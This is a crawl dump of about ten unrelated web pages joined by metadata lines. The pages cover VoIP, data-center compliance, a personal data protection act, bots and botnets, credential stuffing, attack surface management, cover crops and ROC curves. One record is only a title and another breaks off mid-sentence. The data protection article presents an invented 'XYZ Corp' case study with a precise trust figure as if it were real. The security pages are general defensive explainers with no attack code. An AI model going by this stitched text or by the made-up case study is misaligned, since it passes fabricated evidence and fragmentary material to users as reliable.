Users put their trust in you; they must be protected | <urn:uuid:1d7c7127-b658-490d-b755-75f7494752a3> | CC-MAIN-2024-38 | https://fluidattacks.com/blog/hit-miss/ | 2024-09-19T11:59:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00623.warc.gz | en | 0.945909 | 1,562 | 2.890625 | 3 |
The cloud has had a significant impact on traditional phone system technology, leading to the widespread adoption of Voice over Internet Protocol (VoIP) systems. VoIP is a type of phone system that uses the internet to transmit calls, rather than traditional phone lines.
One of the main benefits of VoIP is that it allows users to make and receive calls from any location with an internet connection. This is particularly useful for businesses that have employees working remotely or in multiple locations, as it allows them to stay connected and collaborate effectively.
VoIP systems can also be integrated with other communication and collaboration tools, such as video conferencing and instant messaging, which can further enhance productivity and collaboration. In addition, VoIP systems can often be customized with features such as call forwarding, voicemail, and call waiting, which can be useful for businesses of all sizes.
One of the main drivers of the move towards VoIP has been the increasing adoption of cloud-based solutions. Cloud-based VoIP systems are typically hosted and maintained by a third party, which means that businesses do not need to invest in and maintain their own hardware and infrastructure. This can be particularly appealing for small and medium-sized businesses, as it can help to reduce upfront costs and IT burden.
In addition to the benefits of VoIP, there are also some potential drawbacks to consider. For example, VoIP systems rely on a reliable internet connection in order to work properly, so if the internet goes down, phone service will be disrupted. In addition, VoIP systems may not be suitable for businesses that require a high level of security for their phone calls, as it may be more difficult to guarantee the security of internet-based calls compared to traditional phone lines.
In conclusion, the impact of the cloud on traditional phone system technology has been significant, leading to the widespread adoption of VoIP systems. VoIP systems offer a range of benefits, including the ability to make and receive calls from any location with an internet connection, integration with other cloud communication and collaboration tools, and customization with a range of features. However, it is important for businesses to carefully consider the potential drawbacks of VoIP, including the reliance on a reliable internet connection and potential security concerns. | <urn:uuid:dad74da1-72cd-433e-9fe2-ceb7dcd60496> | CC-MAIN-2024-38 | https://em360tech.com/tech-article/impact-cloud-traditional-phone-system-technology-and-move-towards-voip | 2024-09-08T12:13:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00723.warc.gz | en | 0.966986 | 449 | 2.96875 | 3 |
Data governance is now core to the operations of just about all modern businesses. For the vast majority of businesses, a part of this involves ensuring compliance with certain data security standards. With that in mind, here is a quick guide to what you need to know about compliance in data centers.
Compliance in data centers is the process of achieving and maintaining demonstrable adherence to mandated data security standards. These data security standards are typically set down by regulatory bodies and relate to the areas they oversee. For example, the Payment Card Industry Security Standards Council (PCI SSC) oversees PCI/DSS.
Sometimes, data security standards are set down by a government or government agency. In general, however, these data security standards relate to the government body itself. For example, FedRAMP is overseen by the U.S. federal government and relates to working with the U.S. federal government.
Data sovereignty rules are the rules that determine which government(s) has/have jurisdiction over what data. These data sovereignty rules may in turn determine how data is to be treated. This means that data sovereignty rules can have much the same impact as compliance rules. Technically, however, they are different.
For example, if data relates to EU residents (not just citizens), the EU automatically claims data sovereignty over it. The EU requires all entities handling this data to comply with its general data protection regulations (GDPR). GDPR is not, technically, a compliance program. Effectively, however, it operates as one and is often treated as one.
Here are five of the main challenges in achieving and maintaining compliance in data centers along with some suggestions on how you can address them.
Implement a robust compliance management system that centralizes all relevant regulations and standards. Utilize automated tools for tracking updates and changes in regulations. Regularly engage legal and compliance experts to interpret and apply complex requirements accurately.
Continuously monitor industry sources for information about regulatory and legal changes. Establish a dedicated team responsible for tracking emerging standards and laws. Implement agile compliance processes that can quickly adapt to new requirements through regular review and updates of policies and procedures.
Conduct thorough research to understand jurisdiction-specific regulations applicable to data center operations. Develop a comprehensive compliance strategy that accounts for variations in legal requirements across different regions. Implement centralized compliance controls and procedures to ensure consistency in operations across jurisdictions.
Employ industry-standard encryption protocols to protect data both in transit and at rest. Implement robust access controls and authentication mechanisms to limit unauthorized access to sensitive data. Regularly conduct vulnerability assessments and penetration testing to identify and address security vulnerabilities promptly.
Perform thorough security assessments of third-party vendors before integrating their services. Implement secure APIs and communication protocols to facilitate data exchange securely. Establish contractual agreements with vendors to enforce security standards and data protection requirements. Regularly monitor and audit third-party activities to ensure compliance with security policies.
Here is an overview of 7 best practices for achieving compliance in data centers.
Maintain comprehensive documentation of security policies, procedures, configurations, and audit trails. Utilize documentation management tools to organize and centralize security documentation for easy access and reference during audits and assessments.
Conduct periodic security audits and assessments to identify vulnerabilities, misconfigurations, and compliance gaps. Utilize automated scanning tools and manual penetration testing to evaluate the effectiveness of security controls.
Implement continuous monitoring tools and techniques to detect security incidents and anomalies in real time. Establish an incident response plan outlining procedures for responding to security incidents, including containment, eradication, and recovery measures.
Enforce granular access controls based on the principle of least privilege (POLP). Utilize role-based access control (RBAC) to restrict access to sensitive data and systems only to authorized personnel.
Utilize strong encryption algorithms (e.g., AES 256-bit) to encrypt data both at rest and in transit. Implement secure transport protocols such as TLS/SSL for encrypting data during transmission over networks.
Deploy IDPS to monitor network traffic and detect suspicious activities or intrusion attempts. Configure IDPS to automatically block or mitigate detected threats in real time to prevent unauthorized access or data breaches.
Implement secure configuration management practices to ensure systems and devices are configured according to security best practices and compliance requirements. Utilize configuration management tools to enforce standardized configurations and detect unauthorized changes.
Data centers, literally by definition, are places to store and/or process large quantities of data. It’s therefore imperative for that data to be kept safe, particularly if it relates to...
Discover the DataBank Difference today:
Hybrid infrastructure solutions with boundless edge reach and a human touch. | <urn:uuid:27afefec-0dbb-4e3a-a88b-c8e31a57f9a3> | CC-MAIN-2024-38 | https://www.databank.com/resources/blogs/compliance-in-data-centers-navigating-regulatory-requirements-for-businesses/ | 2024-09-12T07:04:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00423.warc.gz | en | 0.908944 | 952 | 2.625 | 3 |
Table of Contents
In the digital age, data has become an invaluable asset. Every swipe on a smartphone, every click on a website & every online transaction generates a trove of information that, in totality, forms an intricate web of digital footprints. As businesses and organizations increasingly shift operations online, the volume of personal digital data has skyrocketed. It’s not just about names and email addresses anymore. Today, data encompasses browsing habits, purchasing behaviors, geolocations, biometrics & so much more. In essence, our digital personas now reflect who we are just as much as our realworld interactions.
Yet, with this proliferation of digital data comes a myriad of challenges. How do we ensure that individuals’ data isn’t misused? What steps can be taken to prevent unauthorized access or leaks? More than ever, there’s a pressing need for robust legal frameworks that protect personal digital data. Such structures aim not just to shield individuals from potential misuse but also to instill confidence in digital interactions, assuring people that their digital selves are safeguarded.
Background of the Digital Personal Data Protection Act
The inception of the Digital Personal Data Protection Act didn’t occur in a vacuum. Historically, as technology evolved and the internet became ubiquitous, the initial euphoria of the World Wide Web gave way to growing concerns about data privacy. Reports of significant data breaches, where millions of users’ data were compromised, started making headlines. The misuse of personal data by corporations for profit, without explicit user consent, became a contentious issue.
Global incidents further fueled the fire. Highprofile cases, like the Cambridge Analytica scandal, brought data privacy discussions to dinner tables. It became evident that while technology had leaped bounds, regulations were lagging. There was a glaring gap between what technology could do with data and what it ethically should do.
Moreover, as international trade and collaborations expanded, there arose a need for standardization. Different countries began enacting their own data protection acts, each with its nuances. Organizations operating globally found themselves navigating a patchwork quilt of regulations. There was a clear necessity for a more unified approach, at least in terms of fundamental principles.
Objective and Purpose of the Digital Personal Data Protection Act
With the background established, the Digital Personal Data Protection Act was conceptualised with specific goals in mind.
Primary Goals: Protection of Individual Rights: At its core, the act seeks to uphold and protect the rights of individuals regarding their personal data. This encompasses not just the security of the data but also the control individuals have over it.
Standardisation: By setting clear guidelines and regulations, the act aims to provide a standardised framework that organisations can adhere to, ensuring consistency in data protection measures across the board.
Accountability and Transparency: One of the pivotal objectives is to hold organisations accountable for the data they collect and process. This involves ensuring transparency in how data is used and providing recourse in case of violations.
Alignment with International Standards: The Digital Personal Data Protection Act, while catering to specific regional or national needs, also recognizes the global nature of digital data. As such, it has been crafted keeping in mind international data protection standards, such as the General Data Protection Regulation (GDPR) of the European Union. This alignment ensures that businesses operating in multiple jurisdictions have a cohesive set of principles to adhere to, minimising conflicts and overlaps. It also signifies a global collaborative effort towards a digital future where data protection is paramount.
Core Provisions of the Act
The Digital Personal Data Protection Act isn’t just a paper tiger; it has been meticulously crafted, encompassing various provisions that set the bedrock for digital data protection. Let’s explore its key components.
Definition of Personal Data: In the digital realm, the term ‘personal data’ can be vast and multifaceted. Under the act, personal data refers to any information, whether stored electronically or in physical form, that can be used to directly or indirectly identify an individual. This could range from obvious identifiers like names and addresses to more nuanced data like IP addresses, browser cookies, or even behavioural patterns.
Consent Requirement: The act emphasises the sanctity of individual consent. Organisations are mandated to obtain clear, informed & explicit consent from individuals before collecting, processing, or sharing their data. This means gone are the days of ambiguous terms and conditions buried in fine print. Consent forms must be clear, concise & transparent about the data’s intended use.
Data Minimization Principle:Holding vast amounts of unnecessary data isn’t just ethically questionable; under the act, it’s discouraged. The data minimization principle mandates that organizations should only collect data pertinent to their specified purpose & no more. This not only reduces potential risks but also encourages efficient data management practices.
Rights of Data Subjects:
Right to Access: Individuals have the right to access their data held by organizations. This ensures transparency, allowing individuals to know what data is being stored and how it’s being used.
Right to Rectification: Mistakes happen. If an individual finds inaccurate or incomplete data about themselves stored by an organization, they have the right to request corrections.
Right to Erasure (‘Right to be Forgotten’): This provision allows individuals to request that their data be deleted from an organization’s records, especially if the data is no longer necessary for its initial purpose or if the individual revokes their consent.
Right to Data Portability: Individuals can request a copy of their data in a structured and commonlyused format, ensuring they can easily transfer their data from one service provider to another if they wish.
Data Protection Officer (DPO): To ensure adherence to the act, organizations, especially those dealing with vast amounts of personal data, are required to appoint a Data Protection Officer. The DPO acts as the torchbearer for data protection within the organization, ensuring compliance, addressing concerns & acting as a bridge between the organization and regulatory authorities.
Crossborder Data Transfer: In our globalized world, data often needs to flow across borders. However, this transfer isn’t unrestricted. The act sets forth rules ensuring that personal data isn’t compromised when transferred internationally. Organizations are required to ensure that the destination country or entity offers an equivalent level of data protection.
Enforcement and Penalties
For a law to be effective, robust enforcement mechanisms are pivotal. The act isn’t just a guideline; it has teeth.
A dedicated regulatory authority oversees the act’s implementation, ensuring that its tenets are adhered to. This body is not just a passive observer but has the power to conduct audits, investigations & impose sanctions when necessary.
Penalties for Noncompliance and Breaches:
Noncompliance with the act isn’t taken lightly. Organizations found in violation can face substantial penalties, which can be either a fixed amount or a percentage of their annual turnover, depending on the severity of the breach. This ensures that adhering to the act isn’t just a moral imperative but a financial one.
Mechanism for Reporting Violations:
Individual empowerment is a cornerstone of the act. If individuals feel that their data rights have been infringed upon, they can directly report violations to the regulatory authority. This provision ensures that organizations are held accountable not just by regulators but by the very people whose data they hold.
Impact on Businesses
As the world becomes increasingly digital, businesses find themselves in the unique position of both utilizing and being custodians of vast amounts of personal data. The Digital Personal Data Protection Act, while designed to protect individuals, also greatly impacts the business world. Here’s how:
Adapting Data Collection and Processing Methods:
With the introduction of the act, gone are the days where businesses could freely collect and use data without stringent guidelines. Now, every piece of personal data collected must have a clear purpose. This necessitates a more thoughtful and strategic approach to data collection and processing.
Businesses are now required to implement clear consent mechanisms, ensuring that data subjects are wellinformed. Moreover, with the data minimization principle in play, businesses need to be precise about the data they collect, ensuring it’s strictly relevant to their operations or the services they provide.
Benefits for Businesses:While the act may seem like a hurdle initially, in the long run, it presents multiple benefits for businesses:
Trust & Reputation: In an age where data breaches and privacy concerns frequently make headlines, adherence to the act positions a business as trustworthy. This can be a unique selling proposition, fostering loyalty among customers and clients.
Operational Efficiency: With the mandate to collect only pertinent data, businesses can streamline their data storage and processing methods, leading to more efficient operations and potentially reducing costs.
Legal Compliance & Risk Mitigation: Avoiding hefty penalties and potential litigation can save a business not just money but its reputation. Adhering to the act acts as a shield against potential legal pitfalls related to data misuse.
Case Study: XYZ Corp:
XYZ Corp, a multinational tech company, initially grappled with the provisions of the Digital Personal Data Protection Act. Their vast data repositories contained information collected over years, much of which lacked clear consent records. The company took proactive steps, implementing a comprehensive data audit to assess and clean their databases. They introduced a clear consent mechanism for their users and streamlined their data collection processes, ensuring alignment with the act’s principles. The result? Not only did XYZ Corp successfully adhere to the act, but they also witnessed a 20% increase in user trust, as measured by their annual surveys, establishing them as industry leaders in data protection.
Comparing with Other Global Data Protection Acts
The Digital Personal Data Protection Act, while a significant step towards data protection, isn’t the only legislation of its kind. Let’s delve into how it aligns or deviates from other major data protection laws globally.
General Data Protection Regulation (GDPR):
Originating in the European Union, GDPR has set the gold standard for data protection worldwide. Both GDPR and the Digital Personal Data Protection Act emphasize individual rights, including the right to access, rectification & erasure. However, while GDPR has a broader scope covering all EU residents, the Digital Personal Data Protection Act might be more regionspecific. The fines and penalties under GDPR can be up to 4% of a company’s global annual turnover & it remains to be seen if the Digital Personal Data Protection Act matches this level of punitive measures.
California Consumer Privacy Act (CCPA):
While GDPR focuses extensively on user consent, CCPA, originating in California, USA, emphasizes the right to opt out of data sales. The Digital Personal Data Protection Act, in its essence, seems to incorporate principles from both, ensuring both clear consent mechanisms and offering data subjects the power to dictate how their data is used, especially concerning third party transactions or data sales.
Criticisms and Concerns
Every piece of legislation, no matter how comprehensive, will inevitably face criticisms and concerns from various stakeholders. The Digital Personal Data Protection Act is no exception.
Common Critiques of the Act:
Vague Definitions: Some critics argue that certain terms and provisions within the act are ambiguous. This lack of clarity can lead to confusion among businesses, potentially resulting in unintentional noncompliance.
Overburdensome for Small Businesses: While large corporations might have the resources to quickly adapt, smaller entities may find it challenging to overhaul their data practices in line with the act. The costs and manpower required for such compliance can be daunting for smallscale enterprises.
Potential for Overreach: There are concerns that the act might give the regulatory authority too much power, leading to potential misuse or overpenalization of businesses, especially in borderline violation cases.
Concerns about its Enforcement and Practicality:
Scalability of Enforcement: Given the vast number of digital entities operating today, there’s skepticism about the practicality of enforcing the act uniformly. How will the regulatory authority handle thousands, if not millions, of cases?
Inadequate Penalties: While some feel the act might be too strict, others believe the penalties aren’t stringent enough to deter significant data breaches, especially by large corporations that might view fines as just an operational cost.
In an era where data has been equated to oil in terms of its value, the Digital Personal Data Protection Act emerges as a beacon, guiding the murky waters of digital data handling and protection. Its significance cannot be understated. As digital footprints expand and deepen, it’s crucial for legislation to keep pace, ensuring that individual rights aren’t trampled in the digital stampede.
For businesses, this act isn’t just another regulatory hurdle but an opportunity to build trust, streamline operations & champion ethical data practices. Individuals, on the other hand, are equipped with more control over their digital selves, fostering a safer and more transparent digital ecosystem.
In the ever evolving digital landscape, staying informed, vigilant & proactive is not just recommended, but imperative. The Digital Personal Data Protection Act is a step forward, but it’s up to businesses and individuals alike to walk that path, ensuring a balanced digital world where innovation thrives without compromising personal rights.
Frequently Asked Questions (FAQs)
1. What types of organisations fall under the purview of the act?
The act typically covers any organisation, be it public or private, that collects, processes, or stores personal digital data. This includes both online and offline entities.
2. How does the act affect small businesses?
While the act’s principles apply uniformly, its impact on small businesses might be more pronounced given the potential costs and changes required for compliance. However, many provisions, like the appointment of a Data Protection Officer (DPO), might have thresholds that exempt very small entities.
3. What steps should organisations start with to become compliant?
Organisations should begin with a comprehensive data audit to understand what data they hold and how it’s processed. Following this, they can identify areas of noncompliance and devise strategies to address them, including updating consent mechanisms, ensuring data minimization & implementing clear data protection policies. | <urn:uuid:975a077b-badd-4cce-a947-00fc836b8fae> | CC-MAIN-2024-38 | https://www.neumetric.com/features-of-digital-personal-data-protection-act/ | 2024-09-14T18:30:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00223.warc.gz | en | 0.919554 | 2,933 | 3.078125 | 3 |
Medical records are generally inaccessible and hard to understand. In fact, if you were to try reading your own medical data, you might find that it’s almost as if it’s in a different language. A medical record can be riddled with cryptic phrases, acronyms and complex terms that mean nothing in the eyes of someone that didn’t study medicine for eight years.
The thought of a robot doctor stirs lots of emotions in people. And truth be told, a ton of mystery still surrounds just what will become of this technology. We are still years, if not decades, from a robot doctor being incorporated into the practice of healthcare.
More and more people are clamouring for the ability to communicate with their doctor through email and social media. In fact, a recent study from the Journal of General Internal Medicine reports that 37 percent of patients have emailed their doctor while 18 percent used Facebook to get in touch with their physician. | <urn:uuid:0cf7e717-54e1-4377-be18-109ca6791f43> | CC-MAIN-2024-38 | https://www.microdoctor.com/tag/doctor/ | 2024-09-15T22:48:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00123.warc.gz | en | 0.965017 | 192 | 2.640625 | 3 |
A Bot is a computer connected to the Internet that has been surreptitiously / secretly compromised with malicious logic to perform activities under remote the command and control of a remote administrator.
A Botnet is a collection of computers compromised by malicious code and controlled across a network.
A Bot Master is the controller of a botnet that, from a remote location, provides direction to the compromised computers in the botnet.
Bots and Botnets are pieces of malware which can infiltrate your company through phishing attacks, weak remote access protected only by password and not two-factor authenticated. To protect against Bots and Botnetworks, SMB owners should always ensure they have the following: | <urn:uuid:776db15c-fd81-4a3c-aeed-a0c4c7baa8f3> | CC-MAIN-2024-38 | https://cyberhoot.com/cybrary/bot-botnet-bot-herder-and-bot-master/ | 2024-09-17T06:11:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651739.72/warc/CC-MAIN-20240917040428-20240917070428-00023.warc.gz | en | 0.954014 | 139 | 2.921875 | 3 |
The Importance of Cover Crops in Sustainable Agriculture
Cover crops have been lauded for their diverse benefits, which include soil health improvements, erosion prevention, and the natural mediation of pests and diseases. Beyond these, they are a vital component of a climate change mitigation strategy; the roots of cover crops dive deep into the soil profile, locking away carbon dioxide and reducing greenhouse gas emissions. The practice contributes significantly to the diversification of farmland ecosystems by providing habitats for a range of species. In spite of this, the trajectory of cover crop adoption seems to be flattening across the Midwest. This plateau represents a critical roadblock in the journey towards the widespread implementation of sustainable and resilient farming systems.
The situation is particularly stark given the bullish goals set by influential agricultural organizations committed to enhancing soil health through cover cropping. As we approach the deadlines for milestones proposed by entities like the Farmers for Soil Health and the Midwest Row Crop Collaborative, it’s becoming increasingly evident that reassessment of strategies and renewed effort are crucial to overturn the slowing momentum in cover crop adoption.
Analyzing the Slowdown in Adoption Rates
The USDA’s latest agricultural census uncovers a nuanced picture; amidst an overall decline, states such as Colorado and Wisconsin have seen a steady climb in the integration of cover crops. Conversely, the downturn in Kentucky and Tennessee is a stark reminder that across the Midwest, the adoption rates vary widely and are influenced by a complex mix of factors. These include economic incentives, access to information and education about the benefits of cover crops, and the role of government policy in supporting sustainable practices.
The stalling of growth in cover crop acreage raises critical questions regarding the effectiveness of outreach and education programs intended to encourage farmers to adopt these environmentally friendly practices. It also indicates that there may be significant barriers to adoption that have not been adequately addressed. Understanding and overcoming these obstacles are pivotal for not only advancing cover crop adoption but also for securing the environmental and agronomic benefits they offer.
Leveraging Data to Accelerate Adoption: The Role of OpTIS
In facing the challenge of stalled cover crop adoption rates, we look towards technological innovation for solutions—specifically the utility of the Operational Tillage Information System, or OpTIS. This resource plays an indispensable role in demystifying trends and furnishing stakeholders with actionable data. By accruing detailed insights through remote sensing, OpTIS facilitates informed decision making that can catalyze a reinvigorated movement toward the wide-scale implementation of cover crops.
Considering the disparities between the remote sensing data and Ag Census reports, the development of OpTIS version 5.0 is anticipated with eagerness, as it holds the potential to offer an elevated standard of precision. The importance of regular and reliable data cannot be overstated, as it acts as both a compass and a benchmark for the advancement of conservation practices.
OpTIS: A Multifaceted Tool for Diverse Stakeholders
The utilization of OpTIS extends beyond mere metrics and into tangible applications for a diverse pool of stakeholders within the agricultural domain. For researchers, the data serves as a cornerstone for environmental modeling, allowing for an analysis of the broader impact of conservation practices. Conservation groups leverage OpTIS data to structure their educational efforts, delivering outreach that underscores the pragmatic advantages and application of cover crops.
Government entities also find immense value in OpTIS. Its data steers conservation initiatives and informs policy, ensuring that regulatory frameworks promote sustainable agriculture. As the OpTIS project continues to evolve, the goal remains consistent: to ensure that decisions regarding agricultural conservation practices are supported by the most accurate and comprehensive data available.
Future Prospects: Funding and Path Forward
The significance of a tool like OpTIS has propelled efforts to secure ongoing funding for its operation well into the future. Amid a backdrop of public funding efforts—including the Inflation Reduction Act and the Partnerships for Climate-Smart Commodities—there is a concerted push to ensure that OpTIS remains a pivotal resource for tracking and encouraging the adoption of climate-smart practices like cover cropping.
In the fight to reinvigorate the adoption of cover crops across the Midwest, data-driven solutions will be at the forefront. Tools such as OpTIS, coupled with strong collaboration across the agricultural sector, are instrumental in overcoming the current slump. By providing clear, actionable insights, there is hope for realizing the full potential of cover crops in creating a resilient and sustainable agricultural future. | <urn:uuid:bac6caa8-5b21-4fe6-be24-295e83fc4336> | CC-MAIN-2024-38 | https://bicurated.com/data-analytics-and-visualization/midwest-sees-cover-crop-adoption-slowdown-despite-benefits/ | 2024-09-18T08:10:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00823.warc.gz | en | 0.919799 | 917 | 3.375 | 3 |
Credential stuffing is a method what cyber criminals use to break into online user accounts. It is done through utilizing previously stolen user credentials (passwords and usernames). With credential stuffing, hackers use the stolen data in big masses to break into other user accounts across the internet. When successful, credential stuffing can lead to account takeover. It can also lead to online identity theft, when criminals get their hands on personal information stored on online accounts.
Credential stuffing is what hackers do with stolen login credentials
Credential stuffing can only be done when criminals have successfully stolen login credentials from web services, companies, or organizations. Criminals can either steal the credentials themselves in data breaches or data leaks, or buy them from dark web marketplaces. After criminals have acquired the credentials, they start the process called credential stuffing.
They fill the stolen user credentials in masses to other web services to see if they can access them with the same login credentials. They do this with the help of special programs, which speeds up the process significantly. Criminals can do this to as many sites they want but are usually targeting services that include payment information.
As Olli Bliss, cyber security expert from F-Secure explains, “Think of it as taking millions and millions of keys and trying to unlock doors. And these doors are sites and services we use every single day. It could be your Instagram account; it could be your Facebook account, or it could be your login to PayPal. So, cyber criminals are basically just trying to see which combination will unlock these services.”
This is possible because people reuse passwords
What makes credential stuffing possible is that people use the same passwords on multiple accounts. Credential stuffing is basically just testing if the stolen login credentials can be used on other online accounts. If the login credentials are different compared to the stolen ones, hackers can’t get in. At least by utilizing credential stuffing techniques.
It’s a well-known fact that most people reuse their passwords. And sure, it’s easy and convenient. But by doing so, web users make themselves an easy target for credential stuffing attacks. Because web users can’t prevent their login credentials from being exposed in data breaches and data leaks, their protection lies in securing their online user accounts.
Here’s how you can secure your online accounts
Use unique and strong passwords
Using the same or few passwords everywhere endangers all your user accounts when your password gets compromised. Web criminals are well-aware that most people reuse their passwords. When they successfully steal one, they will try it on many user accounts. When you use unique passwords, they can’t access your other accounts with just one stolen password. You can find more on this topic from this blog post. Store your passwords in a password manager for easy access and easier remembering.
Use 2-factor authentication
2-factor authentication is a second barrier in addition to your password that protects your user account. It makes it a lot harder for criminals to use stolen user credentials. Read more about 2-factor authentication and how you can enable it from this blog post.
Get F-Secure ID PROTECTION password manager
F-Secure ID PROTECTION is a handy password manager. You can store and create unique and strong passwords and access them from any device. You can also use it to autofill your passwords when needed. Not only that, ID PROTECTION monitors your personal information online. When a service you use gets breached or a data leak is detected, you will receive an alert with expert guidance on what to do next. Try it for free, with no credit card required! >>
Watch Olli Bliss’ expert answer to the question from the video below. | <urn:uuid:416c8307-8c8e-43d0-89ad-3deeec7184af> | CC-MAIN-2024-38 | https://blog.f-secure.com/what-is-credential-stuffing/ | 2024-09-18T08:02:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00823.warc.gz | en | 0.930349 | 763 | 2.890625 | 3 |
Gartner research shows that attack surface expansion is the number one trend for increasing potential cyber threats. Not only that, but according to the Enterprise Strategy Group’s research report on security hygiene and posture management, nearly seven in ten (69%) organisations admit that they have experienced at least one cyber-attack that started through the exploit of an unknown, unmanaged, or poorly managed internet-facing asset. The reality is, cyberattacks aren’t going anywhere and with many businesses permanently moving to remote and hybrid working conditions threats are constantly increasing.
What is the attack surface?
A company’s attack surface is the sum of all possible security risk exposures in an organisation’s software environment. Essentially, it is all potential vulnerabilities, known and unknown across all hardware, software and network components. It is crucial that companies are aware of their entire attack surface, allowing them to place sufficient security measures in place.
Attack surfaces can generally be categorised into three types. First, digital. The digital attack surface encompasses the entire network and software environment of an organisation. It can include applications, code, ports and other entry and exit points. Second, physical. This includes all of an organisation’s endpoint devices such as desktop systems, laptops, mobile devices, IoT and USB ports. And lastly, Social engineering attacks. Social engineering attacks prey on the vulnerabilities of human users. The most common types of attacks against organisations include spear phishing and other techniques that deceive an employee into giving up vital company information.
Why companies need to be aware of their attack surface
As an organisation’s digital footprint rapidly expands, the risk created by exposed assets grows too. Recent trends such as digital transformation, hybrid work, Internet of Things (IoT) and more have led to the rapid expansion of many companies’ internet-facing assets, but unfortunately, their cybersecurity has not kept up with this expansion. Traditionally, workloads, websites, user credentials, storage and other invaluable business information were controlled by central, on-premise IT managers. But today, most digital assets are located outside the traditional enterprise perimeter. This means that their visibility and control have become limited. The result? A dramatic increase in many organisations’ risk profiles.
How companies can manage their own attack surface
The number one tactic companies can use to reduce the chance of a breach is to reduce their attack surface. This involves making sure a firewall is in place to limit the number of accessible TCP/IP ports, applying relevant security updates and patches and limiting the amount of code that is exposed. On top of that, companies can also limit access to customers or registered users and administration or content-management modules. And finally, review all digital assets and disable unnecessary applications.
Alternatively, companies can outsource their attack surface cybersecurity via Attack Surface Management (ASM) solutions. ASM is the continuous discovery, analysis, remediation and monitoring of the cybersecurity vulnerabilities and potential attack vectors that make up an organisation’s attack surface.
This enables security teams to establish a proactive security posture in the face of a constantly growing and morphing attack surface. ASM solutions provide real-time visibility into vulnerabilities and attack vectors as they emerge, allowing companies to stay one step ahead of threat actors at all times. It also allows them to close security gaps by employing an outside-in view of the enterprise attack surface. This empowers teams to prioritise and manage all exposed internet-facing assets.
What to look for in Attack Surface Management solutions
It is vital that businesses choose the correct and most effective ASM solution for their specific needs. The best solutions provide an outside-in view of the enterprise’s attack surface. This allows security teams to prioritise and manage all exposed internet-facing assets that are centralised or remote across on-premises environments, subsidiaries, cloud and third-party vendors, all with a zero-touch approach. It is also important to choose a solution that is backed by intelligence. Leading ASM solutions prioritise potential risks by leveraging industry-leading adversary intelligence to guide precise actions based on the most critical risks. They’ll also use a proprietary real-time 24/7 engine to scan the entire internet across the globe, enabling organisations to see how their attack surface looks from an adversary’s country-centric view. This provides a holistic view of every possible exposure and allows proactive prevention. Effective ASM solutions would also generate automatically, for every identified risk, quick-to-implement, actionable remediation steps for IT and security teams to apply for real-time vulnerability mitigation.
How to protect your attack surface in 2023
Cybersecurity is a cat-and-mouse game, with adversaries’ techniques for finding exposed and vulnerable assets often outpacing an organisation’s ability to discover the problem. In general, adversaries often have a better sense of organisational risk exposure than the organisation itself. A thorough attack surface management solution can support teams deploy a watchful eye over their digital perimeter. Constant, real-time asset management is essential to any thorough cyber security strategy — particularly as cyber attackers become more sophisticated in their methods of attack. Companies that do so are more likely to survive the cyberattack onslaught. | <urn:uuid:53369dfa-7047-423f-9b94-70071a63d030> | CC-MAIN-2024-38 | https://www.ec-mea.com/attack-surface-expansion-is-the-number-one-threat-to-a-businesss-cybersecurity/ | 2024-09-19T15:16:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00723.warc.gz | en | 0.944441 | 1,064 | 2.546875 | 3 |
The ROC curve visualization (on the ROC Curve tab) helps you explore classification, performance, and statistics for a selected model. ROC curves plot the true positive rate against the false positive rate for a given data source.
Evaluate a model using the ROC curve¶
Select a model on the Leaderboard and navigate to Evaluate > ROC Curve.
The curve is highlighted with the following elements:
- Circle—Indicates the new threshold value. Each time you set a new display threshold, the position of the circle on the curve changes.
- Gray intercepts—Provides a visual reference for the selected threshold.
- 45 degree diagonal—Represents the "random" prediction model.
Analyze the ROC curve¶
View the ROC curve and consider the following:
ROC curve shape¶
Use the ROC curve to assess model quality. The curve, drawn based on each value in the dataset, plots the true positive rate against the false positive rate. Some takeaways from an ROC curve:
An ideal curve grows quickly for small x-values, and slows for values of x closer to 1.
The curve illustrates the tradeoff between sensitivity and specificity. An increase in sensitivity results in a decrease in specificity.
A "perfect" ROC curve yields a point in the top left corner of the chart (coordinate (0,1)), indicating no false negatives and no false positives (a high true positive rate and a low false positive rate).
The closer the curve comes to the 45-degree diagonal of the ROC space, the less accurate the model and closer it is to a random assignment model.
The shape of the curve is determined by the overlap of the classification distributions.
Area under the ROC curve¶
The AUC (area under the curve) is literally the lower-right area under the ROC Curve.
AUC does not display automatically in the Metrics pane. Click Select metrics and select Area Under the Curve (AUC) to display it.
AUC is a metric for binary classification that considers all possible thresholds and summarizes performance in a single value, reported in the bottom right of the graph. The larger the area under the curve, the more accurate the model, however:
An AUC of 0.5 suggests that predictions based on this model are no better than a random guess.
An AUC of 1.0 suggests that predictions based on this model are perfect, and because a perfect model is highly uncommon, it is likely flawed (target leakage is a common cause of this result).
StackExchange provides an excellent explanation of AUC.
Kolmogorov-Smirnov (KS) metric¶
For binary classification projects, the KS optimization metric measures the maximum distance between two non-parametric distributions.
The KS metric evaluates and ranks models based on the degree of separation between true positive and false positive distributions.
The KS metric does not display automatically in the Metrics pane. Click Select metrics and select Kolmogorov-Smirnov Score to display it.
For a complete description of the the Kolmogorov–Smirnov test (K–S test or KS test), see the Wikipedia article on the topic. | <urn:uuid:d367569e-0f9b-4045-9263-e5650bac0a87> | CC-MAIN-2024-38 | https://docs.datarobot.com/en/docs/modeling/analyze-models/evaluate/roc-curve-tab/roc-curve.html | 2024-09-07T15:06:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00087.warc.gz | en | 0.872076 | 670 | 2.75 | 3 |
